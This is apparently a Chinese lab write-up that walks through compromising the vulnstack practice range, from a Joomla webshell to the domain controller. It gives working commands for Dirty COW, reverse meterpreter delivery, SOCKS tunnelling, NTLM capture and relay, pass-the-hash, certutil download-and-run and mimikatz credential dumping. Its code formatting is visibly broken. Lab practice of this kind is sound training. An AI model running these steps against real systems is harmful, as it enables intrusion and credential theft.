环境准备

靶场环境:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 打开虚拟机镜像为挂起状态,开启后第一时间进行快照,部分服务未做自启,重启后无法自动运行。

开机之前需要先添加一个192.168.93.0/24的桥接网卡作为内部网络:

  • Win:VMware > 编辑 > 虚拟网络编辑器 > 添加网络
  • Mac:VMware > 偏好设置 > 网络 > 解锁后添加,也可以通过命令如下添加: ```bash

    添加网卡

    $ sudo vim /Library/Preferences/VMware\ Fusion/networking answer VNET_2_DHCP yes answer VNET_2_HOSTONLY_NETMASK 255.255.255.0 answer VNET_2_HOSTONLY_SUBNET 192.168.93.0 answer VNET_2_VIRTUAL_ADAPTER yes

配置网络

$ sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli —configure

启动网络服务

$ sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli —start

验证

$ ifconfig

  1. 添加完网卡后打开虚拟机会连接到VMnet2网卡(如果没有就手动连一下)。其中`Web-Centos`为出网机,需要重新获取IP,然后Ping测试一下各主机连通性
  2. ```bash
  3. # 获取IP
  4. $ service network restart 
  6. # 连通测试
  7. $ ping 192.168.93.10
  8. $ ping 192.168.93.20
  9. $ ping 192.168.93.30

image.png

IP 备注
Web-Centos 192.168.111.10/ 192.168.93.100 出网机
Web-Ubuntu 192.168.93.120 Nginx反代
Win2012 192.168.93.10 域控(test.org)
Win2008 192.168.93.20 域用户
Win7 192.168.93.30 域用户
Kali 192.168.111.2 攻击机

image.png

外网打点

信息收集

  • 端口扫描一下,发现开启22/80/3306等端口,其中80端口存在Joomla CMS,通过浏览器访问 ```bash $ nmap 192.168.111.10 -T4 -A -sV
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644001460266-7b469589-6b33-4847-b770-82c7c0ed41ee.png#clientId=u6fda64a1-2c90-4&from=paste&height=470&id=ub4eff18c&margin=%5Bobject%20Object%5D&name=image.png&originHeight=940&originWidth=1172&originalType=binary&ratio=1&size=329120&status=done&style=none&taskId=ue8f60016-91c2-4a54-806c-2044b2e4d05&width=586)
  3. - 使用`Joomscan`进行漏洞扫描
  4. ```bash
  5. $ joomscan -u <URL>
  7. # 如果没有需要先安装
  8. $ apt install joomscan

image.png

  • 未找到可利用的漏洞,但发现一个配置文件configuration.php~,访问得到数据库账号密码 ```php public $dbtype = ‘mysqli’; public $host = ‘localhost’; public $user = ‘testuser’; public $password = ‘cvcvgjASD!@’; public $db = ‘joomla’; public $dbprefix = ‘am2zu_’; public $live_site = ‘’; public $secret = ‘gXN9Wbpk7ef3A4Ys’;
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644002789780-f602c82a-97c4-4898-bb48-ecb8d307e137.png#clientId=u6fda64a1-2c90-4&from=paste&height=661&id=ue1b0673f&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1322&originWidth=1872&originalType=binary&ratio=1&size=285896&status=done&style=none&taskId=u5a62103b-4325-4a1b-8821-579cc60d4c8&width=936)
  3. - 使用Navicat尝试连接
  5. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644002942383-6380843a-115d-45e6-8e90-4d062fb4e8eb.png#clientId=u6fda64a1-2c90-4&from=paste&height=426&id=u0546baf3&margin=%5Bobject%20Object%5D&name=image.png&originHeight=852&originWidth=976&originalType=binary&ratio=1&size=112938&status=done&style=none&taskId=u08027568-a2a9-4931-a176-a696cb5f870&width=488)
  6. <a name="Z05Sd"></a>
  7. ### 添加管理员账号
  9. - 进入数据库后找到`am2zu_users`表,该表存放了管理员账号密码,但是密文未能破解。这里参考[官方文档 - 如何恢复或重置管理员密码](https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn)来添加用户,注意需要修改表名前缀为`am2zu_`
  10. ```sql
  11. -- 账号密码为:admin2/secret
  12. INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) 
  13. VALUES ('Administrator2', 'admin2', 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
  15. INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) 
  16. VALUES (LAST_INSERT_ID(),'8');

image.png

  • 然后访问管理员后台:/administrator/,使用admin2/secret进行登录

    模板Getshell

  • 后台中依次访问Extensions > Templates > Templates,选择模板进入并点击New File,输入一句话木马后保存

image.png

  • 这里选择的模板为Beez3,所以对应的木马路径为:/templates/beez3/a.php。使用蚁剑进行连接,连上后发现无法执行命令

image.png

disable_functions

  • 再次新建模板,写入phpinfo进行查看,发现设置了disable_functions ```php <?php phpinfo(); ?>
  2. - 可以通过蚁剑的插件`绕过disable_functions`来绕过,选择`LD_PRELOAD`模式
  3.    - 注意:启动的WebServer根目录需要和木马文件所在目录一致
  5. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644005695846-e34ca02b-51af-463f-9cd4-1ffd2a085cb5.png#clientId=u0231a706-225a-4&from=paste&height=652&id=udf5f4fe9&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1304&originWidth=1878&originalType=binary&ratio=1&size=306761&status=done&style=none&taskId=u2503f203-1d4d-441f-b144-0acbbd8ffda&width=939)
  7. - 点击开始后会在目标网站生成`.antproxy.php``/tmp/.ant_x64.so`两个文件,使用蚁剑连接`.antproxy.php`文件,密码和前面木马文件一样,连接后即可执行命令。收集下信息:
  8.    - 权限为`www``Ubuntu`主机,IP`192.168.93.120`
  10. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644006344340-b0a3590c-af44-4b34-a25a-97b15e11b544.png#clientId=u0231a706-225a-4&from=paste&height=353&id=u31979dd5&margin=%5Bobject%20Object%5D&name=image.png&originHeight=706&originWidth=1548&originalType=binary&ratio=1&size=193396&status=done&style=none&taskId=ub5534d37-7bb3-495f-97a9-bc71363c23e&width=774)
  12. - 通过翻文件发现`/tmp/mysql/test.txt`
  14. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644006664913-d1da0066-cd43-46ff-a6a7-9b9e47f570d0.png#clientId=u0231a706-225a-4&from=paste&height=188&id=u3ab672e0&margin=%5Bobject%20Object%5D&name=image.png&originHeight=376&originWidth=722&originalType=binary&ratio=1&size=38753&status=done&style=none&taskId=u2d454d20-827d-4fbc-97f2-c9c9714949c&width=361)
  16. - 尝试SSH连接
  17. ```bash
  18. $ ssh wwwuser@192.168.111.10
  19. # wwwuser_123Aqx

image.png

  • 通过查看/etc/nginx/nginx.cong文件,可以看到Nginx反代标志proxy_pass,即当前Centos主机对外提供了Nginx反代,该主机上的Nginx将流量转发给Ubuntu主机192.168.93.120,所以前面GetShell的Ubuntu主机才是真正的Web服务器。

image.png

权限提升

通过scp上传

$ scp ./dirty.c wwwuser@192.168.111.10:/home/wwwuser

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644062740013-8f2af808-08ba-4933-a1b2-21de1e213487.png#clientId=u89636748-b3eb-4&from=paste&height=268&id=ubee81b4f&margin=%5Bobject%20Object%5D&name=image.png&originHeight=536&originWidth=1936&originalType=binary&ratio=1&size=153316&status=done&style=none&taskId=u5fe4baed-5cf3-4ca3-be2d-8b68ec86193&width=968)
  3. - 在目标机器上编译并执行
  4. ```bash
  5. $ gcc -pthread dirty.c -o dirty -lcrypt
  6. $ ./dirty <New-Password>

image.png

  • 此时会生成一个新用户firefart,密码为设置的密码 ```bash $ su firefart
  1. <a name="qdygk"></a>
  2. ### 上线MSF
  4. - 这里用到MSF的`web_delivery`模块,此模块支持在本地监听一个端口,其他机器一旦访问该端口就会将该端口内的文件读取至本地执行
  5. ```bash
  6. msf6> use exploit/multi/script/web_delivery
  7. msf6> set target 7
  8. msf6> set payload linux/x64/meterpreter/reverse_tcp
  9. msf6> set lhost 192.168.111.2
  10. msf6> set lport 9999
  11. msf6> exploit

image.png

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644064409214-5f593d1c-a954-44a2-8f50-8b18187e8a3f.png#clientId=u7370feb7-cdf7-4&from=paste&height=344&id=u51319764&margin=%5Bobject%20Object%5D&name=image.png&originHeight=688&originWidth=2530&originalType=binary&ratio=1&size=710856&status=done&style=none&taskId=ue0955a5e-9319-424e-a926-98870dc29a6&width=1265)
  2. <a name="BWne9"></a>
  3. ### 路由转发和代理
  5. - MSF配置路由转发
  6. ```bash
  7. # Background
  8. $ route add 192.168.93.0 255.255.255.0 1
  9. $ route print

image.png

  • MSF配置路由转发只能将msfconsole带进内网,如果使用其它工具,还需要配置Socks代理。MSF6中可使用auxiliary/server/socks_proxy模块(之前是auxiliary/server/socks4a) ```bash msf6> use auxiliary/server/socks_proxy msf6> set srvport 1080 msf6> set version 4a msf6> run
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644159621009-96d1010c-a37e-4ae3-b1e2-a9f524957a83.png#clientId=ud777a690-5b5e-4&from=paste&height=239&id=u6df04f03&margin=%5Bobject%20Object%5D&name=image.png&originHeight=478&originWidth=1448&originalType=binary&ratio=1&size=201269&status=done&style=none&taskId=u7985f178-42c0-4dad-b48b-7915b0c4666&width=724)
  3. - Kali配置`proxychains4`。如果使用时出现`socks error or timeout`,需要检查配置
  4. ```bash
  5. $ vim /etc/proxychains4.conf
  7. # 最后一行修改为
  8. socks4 127.0.0.1 1080
  10. # 后续就可以通过 proxychains4 <CMD> 执行命令来将程序代理进内网
  • 也可以使用ew工具,Kali和目标机器Centos都是Linux,因此下载ew_for_linux64即可 ```bash

    同样使用scp上传ew

    $ scp ew_for_linux64 wwwuser@192.168.111.10:/home/wwwuser/

分别在两台机器执行

Kali

$ ./ew_for_linux64 -s rcsocks -l 1080 -e 8888

Centos

$ ./ew_for_linux64 -s rssocks -d -e 8888

提示权限不够就加执行权限

chmod +x ew_for_linux64

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644065709409-bde1acac-7fb9-4718-a2e4-b843e2bed4c4.png#clientId=ubdd07b9d-3dd0-4&from=paste&height=597&id=u810eca37&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1194&originWidth=1896&originalType=binary&ratio=1&size=564070&status=done&style=none&taskId=ud80b32d2-e4bc-4234-acc6-3caa84fb6c9&width=948)
  2. <a name="EuI3y"></a>
  3. ## 内网渗透
  4. <a name="f4rAR"></a>
  5. ### 信息收集
  6. <a name="Fd4sI"></a>
  7. #### 存活探测
  9. - UDP探测:`auxiliary/scanner/discovery/udp_probe`
  10. ```bash
  11. msf6> use auxiliary/scanner/discovery/udp_probe
  12. msf6> set rhosts 192.168.93.1/24
  13. msf6> run

image.png

  • SMB探测:auxiliary/scanner/smb/smb_version ```bash msf6> use auxiliary/scanner/smb/smb_version msf6> set rhosts 192.168.93.1/24 msf6> run
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644162139218-66f89cda-a58d-4ce1-a709-b85ad7565048.png#clientId=ud777a690-5b5e-4&from=paste&height=613&id=u75796983&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1226&originWidth=2352&originalType=binary&ratio=1&size=1048507&status=done&style=none&taskId=ua42ccdad-d149-411a-8245-769e6fee13c&width=1176)
  3. - 经过探测,发现目标网段存在`TEST`域,其中`10/20/30`三台机器存活,对其进行端口扫描
  4. ```bash
  5. $ proxychains4 nmap -Pn -sT -sV 192.168.93.10 192.168.93.20 192.168.93.30 -F

image.png
image.png

横向移动

有几个打法:MSSQL NTLM Stealer、SMB爆破、NTLM Relay。这里使用的是MSSQL NTLM Stealer

  • 前面探测到192.168.93.20这台机开启了1433端口,尝试进行连接。账号密码则使用前面Joomla CMS那个配置文件中收集到的:testuser / cvcvgjASD!@ ```bash

    apt install freetds-bin

    $ proxychains4 tsql -S 192.168.93.20 -U testuser
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644162947257-97a2f60d-2470-44ab-8206-7f38322ba16a.png#clientId=ud777a690-5b5e-4&from=paste&height=352&id=u3592a6e2&margin=%5Bobject%20Object%5D&name=image.png&originHeight=704&originWidth=1510&originalType=binary&ratio=1&size=252725&status=done&style=none&taskId=u6272adf6-f840-478e-a535-09736fe0b45&width=755)
  3. <a name="kyss9"></a>
  4. #### Responder环境配置
  6. - Centos使用工具[Responder](https://github.com/lgandx/Responder)进行监听
  7.    - 这个工具的最新版本需要Python3,但运行后发现报错`No module named _ssl`。原因是Python3支持OpenSSL版本最低为`1.0.2`,而该Centos系统比较老,自带的Openssl版本为`1.0.1`。所以需要安装更高版本的OpenSSL
  8. - 首先下载下面几个工具,通过`scp`上传到服务器
  9.    - OpenSSL: [https://www.openssl.org/source/openssl-1.1.1g.tar.gz](https://www.openssl.org/source/openssl-1.1.1g.tar.gz)
  10.    - Python3: [https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz](https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz)
  11.    - Responder: [https://github.com/lgandx/Responder](https://github.com/lgandx/Responder)
  12. ```bash
  13. $ scp openssl-1.1.1g.tar.gz wwwuser@192.168.111.10:/home/wwwuser
  14. $ scp Python-3.6.9.tgz wwwuser@192.168.111.10:/home/wwwuser
  15. $ scp -r Responder/ wwwuser@192.168.111.10:/home/wwwuser
  16. # wwwuser_123Aqx
  18. # 安装OpenSSL
  19. $ tar -zxvf openssl-1.1.1g.tar.gz && cd openssl-1.1.1g/
  20. $ ./config --prefix=/usr/local/openssl shared zlib
  21. $ make && make install
  22. $ echo 'export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/openssl/lib' >> ~/.bash_profile
  23. $ source ~/.bash_profile
  25. # 安装Python3
  26. $ tar -zxvf Python-3.6.9.tgz && cd Python-3.6.9/
  27. $ ./configure prefix=/usr/local/python3 --with-openssl=/usr/local/openssl
  28. $ make && make install
  29. $ echo '
  30. #配置python
  31. export PYTHON_HOME=/usr/local/python3
  32. export PATH=$PYTHON_HOME/bin:$PATH' >> ~/.bash_profile
  33. $ source ~/.bash_profile
  35. # 测试
  36. $ python3 
  37. >> import ssl
  38. >> import ctypes
  39. # 没有报错即为成功
  41. # 安装依赖
  42. $ pip3 install netifaces six pycryptodome pycryptodomex

Net-NTLM Hash

Net-NTLM Hash并不能直接用来PTH,但有可能通过暴力破解来获取明文密码

  • 运行Responder ```bash $ python3 Responder.py -I eth1 -Pv
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644503497775-d8785b0a-6bb4-438d-9263-9800466611c4.png#clientId=u045e5423-f146-4&from=paste&height=663&id=u97eeb263&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1326&originWidth=1436&originalType=binary&ratio=1&size=171266&status=done&style=none&taskId=u30c6d178-2461-4dbf-a1a6-f91d9ff8d96&width=718)
  3. - Kali中使用`auxiliary/admin/mssql/mssql_ntlm_stealer`,执行`xp_dirtree`,触发UNC
  4. ```bash
  5. # testuser / cvcvgjASD!@
  6. msf6> use auxiliary/admin/mssql/mssql_ntlm_stealer
  7. msf6> set RHOSTS 192.168.93.20
  8. msf6> set SMBPROXY 192.168.93.100
  9. msf6> set USERNAME testuser
  10. msf6> set PASSWORD cvcvgjASD!@
  11. msf6> exploit

image.png

  • 利用成功,此时可以看到已经获取到了NTLMv2-Hash ```bash [SMB] NTLMv2-SSP Client : 192.168.93.20 [SMB] NTLMv2-SSP Username : WIN2008\Administrator [SMB] NTLMv2-SSP Hash : Administrator::WIN2008:1122334455667788:C21D87D20B23AE44F82D4B4A41D9491C:010100000000000068E94DEE7E1ED801670BA94B6A3AF3B00000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C00080030003000000000000000000000000030000011C4314A8F10C5B6E59317CE9DBBCF8859B4494BEA8E251FCE09E150BA4F27F40000000000000000
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644503590799-19bea180-e2ef-4fdd-9a1b-60f72bcd5fac.png#clientId=u045e5423-f146-4&from=paste&height=663&id=u2467fcb9&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1326&originWidth=2120&originalType=binary&ratio=1&size=473154&status=done&style=none&taskId=u1d0591c4-17c1-4f2a-9210-66a9873da80&width=1060)
  3. - 可以用Hashcat进行暴力破解,得到密码为:`123qwe!ASD`
  4. ```bash
  5. # 查看支持的Mode,这里NTLMv2的Mode为5600
  6. $ hashcat --example-hashes | less
  8. # 暴力破解
  9. $ hashcat -m 5600 hash.txt top1000.txt --force

image.png
image.png

MultiRelay中继攻击

没爆破出来可以尝试中继Win2008打Win7,发现Win2008的administrator凭据可以中继到Win7,所以可知Win2008和Win7的本地administrator密码相同。参考:https://xz.aliyun.com/t/6988#toc-4

  • 运行前需要编译相关工具,这里我在另一台机器完成并上传 ```bash $ apt-get install gcc-mingw-w64-x86-64 $ x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv $ x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644512370634-12aa21d5-9a49-42c0-9aa5-f22378756d8e.png#clientId=u045e5423-f146-4&from=paste&height=222&id=u4f4ffb9d&margin=%5Bobject%20Object%5D&name=image.png&originHeight=444&originWidth=2454&originalType=binary&ratio=1&size=104938&status=done&style=none&taskId=u6390bcc8-60b9-4afa-901c-0305c61d36a&width=1227)
  3. - 上传到`Responder/tools/MultiRelay/bin/`目录,同时上传一个`mimikatz.exe`
  4. ```bash
  5. $ scp Runas.exe wwwuser@192.168.111.10:/home/wwwuser/Responder/tools/MultiRelay/bin
  6. $ scp Syssvc.exe
  7. wwwuser@192.168.111.10:/home/wwwuser/Responder/tools/MultiRelay/bin
  8. $ scp mimikatz.exe wwwuser@192.168.111.10:/home/wwwuser/Responder/tools/MultiRelay/bin
  9. # wwwuser_123Aqx
  • 中继攻击 ```bash

    禁用SMB和HTTP服务,将对应选项修改为Off

    $ vi Responder.conf

开启监听

$ python3 Responder.py -I eth1 -v -F

运行MultiRelay

$ python3 MultiRelay.py -t 192.168.93.30 -u ALL

MSSQL触发UNC

msf6> exploit

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644514693903-f1756c42-9b7a-4141-a247-190222f9a06f.png#clientId=u045e5423-f146-4&from=paste&height=673&id=u653db800&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1346&originWidth=2870&originalType=binary&ratio=1&size=1446322&status=done&style=none&taskId=u30765aad-790d-4fe8-9595-cc40d9c9034&width=1435)
  3. - 此时已经获取到Win7Shell了,然后使用`mimikatz`抓取明文密码。我这里使用mimikatz抓取时一直卡着不动,原因未知。
  4. ```bash
  5. $ mimi "privilege::debug" 
  6. $ mimi "sekurlsa::logonpasswords"

  • 但是可以通过dump来获得NTLM Hash,存储在Responder/tools/MultiRelay/relay-dumps目录下

    1. Administrator:500:aad3b435b51404eeaad3b435b51404ee:31c1794c5aa8547c87a8bcd0324b8337:::

    image.png

    WMI连接

  • 无论是否获得明文密码,都可以通过impacketwmiexec.py进行连接 ```bash

    git clone https://github.com/SecureAuthCorp/impacket

    cd impacket/ && python3 -m pip install .

NTLM Hash

$ proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31c1794c5aa8547c87a8bcd0324b8337 administrator@192.168.93.20

明文密码

$ proxychains4 python3 wmiexec.py ‘administrator:123qwe!ASD@192.168.93.20’

  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644765660617-e49d5c9e-2c78-49f3-b177-e662eae9abdf.png#clientId=u02215989-ecd3-4&from=paste&height=599&id=u5385d0cb&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1198&originWidth=2502&originalType=binary&ratio=1&size=925743&status=done&style=none&taskId=uce6216bf-99b3-4355-bf60-92655d3b5cc&width=1251)
  2. <a name="b7Klt"></a>
  3. ### 攻击域控-0
  4. > 未知Win2008明文密码,使用NTLM Hash通过WMI连接到Win2008,然后获取正向Shell,通过进程迁移提权后读取文件
  6. - MSF生成一个正向shell木马,并开启监听
  7. ```bash
  8. $ msfvenom -p windows/meterpreter/bind_tcp -f exe -o bind.exe
  10. msf6> use exploit/multi/handler 
  11. msf6> set PAYLOAD windows/meterpreter/bind_tcp
  12. msf6> set RHOST 192.168.93.20
  13. msf6> set LPORT 4444   # 前面生成木马时若不指定端口,则默认是这个
  14. msf6> exploit
  • 通过SCP上传到Centos,然后在Centos上开启HTTP服务 ```bash $ scp bind.exe wwwuser@192.168.111.10:/home/wwwuser/

    wwwuser_123Aqx

$ python3 -m http.server 8080

  2. - 通过前面的WMI连接到win2008,下载并执行木马
  3. ```bash
  4. $ proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31c1794c5aa8547c87a8bcd0324b8337 administrator@192.168.93.20
  6. $ certutil -urlcache -split -f http://192.168.93.100:8080/bind.exe 
  7. $ bind.exe
  • 上线之后执行ps,发现存在域管用户的进程,进程迁移 ```bash meterpreter> ps meterpreter> migrate 3800 meterpreter> shell $ whoami
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644775187553-280aae7f-58f9-495f-963c-0e78dd774916.png#clientId=u047660e2-de7f-4&from=paste&height=560&id=u13c4728b&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1120&originWidth=2108&originalType=binary&ratio=1&size=700072&status=done&style=none&taskId=u2cd90aa2-fc43-4df2-bb65-1db638f1e10&width=1054)
  3. - 最后读取文件。这里不知道为什么报错`The network path was not found.`,根据其它参考文章是可以直接读取到的,有点玄学。
  4. ```bash
  5. $ type \\192.168.93.10\C$\Users\Administrator\Documents\flag.txt
  6. $ type \\192.168.93.10\Admin$\Users\Administrator\Documents\flag.txt

攻击域控-1

已知Win2008明文密码,通过令牌窃取提权后读取文件

  • 定位域控 ```bash $ ipconfig /all
  2. - 上传[incognito.exe](https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip)
  3. ```bash
  4. $ proxychains4 smbclient -L 192.168.93.20 -U administrator
  5. $ proxychains4 smbclient //192.168.93.20/ADMIN$ -U administrator
  6. $ put incognito.exe

image.png

  • 列出令牌 ```bash $ cd Windows/ $ incognito.exe list_tokens -u
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644770491460-91da2cdf-9194-4100-b379-da4aa15a295a.png#clientId=u9136b0e5-8eb8-4&from=paste&height=610&id=u69889602&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1220&originWidth=1370&originalType=binary&ratio=1&size=418083&status=done&style=none&taskId=udf363a5a-e123-44a8-b6a1-844212db643&width=685)
  3. - 模拟域管用户,将目标文件复制到本地
  4. ```bash
  5. $ incognito.exe execute -c "TEST\administrator" "cmd /c copy \\192.168.93.10\C$\users\administrator\Documents\flag.txt C:\Windows\flag.txt"

攻击域控-2

已知Win2008明文密码,使用mimikatz抓取域管密码,然后通过IPC连接域控读取文件

  • 上传mimikatz。使用smbclient连接并上传 ```bash $ proxychains4 smbclient -L 192.168.93.20 -U administrator $ proxychains4 smbclient //192.168.93.20/ADMIN$ -U administrator $ put mimikatz.exe
  1. ![image.png](https://cdn.nlark.com/yuque/0/2022/png/520228/1644767373594-9e7432e2-4f65-4d79-b776-deb7567c0899.png#clientId=u9136b0e5-8eb8-4&from=paste&height=508&id=u47c4ed20&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1016&originWidth=1614&originalType=binary&ratio=1&size=455063&status=done&style=none&taskId=u1ee835c5-2c90-4687-b0fb-a073e92cbfa&width=807)
  3. - 获得`TEST\administrator`密码:`zxcASDqw123!`
  4. ```bash
  5. $ cd Windows
  6. $ mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > pwd.log

image.png

  • IPC连接域控 ```bash $ net use \192.168.93.10\admin$ zxcASDqw123!! /user:test\administrator $ dir \192.168.93.10\C$\users\administrator\Documents\flag.txt

```

问题

使用Responder工具那部分踩的坑最多,后来发现原生环境Python2.6+Responder旧仓库的2.3.0版本可以运行,但是这个版本没有MultiRelay.py,最后折腾一番安装Python3+lgandx/Responder成功解决。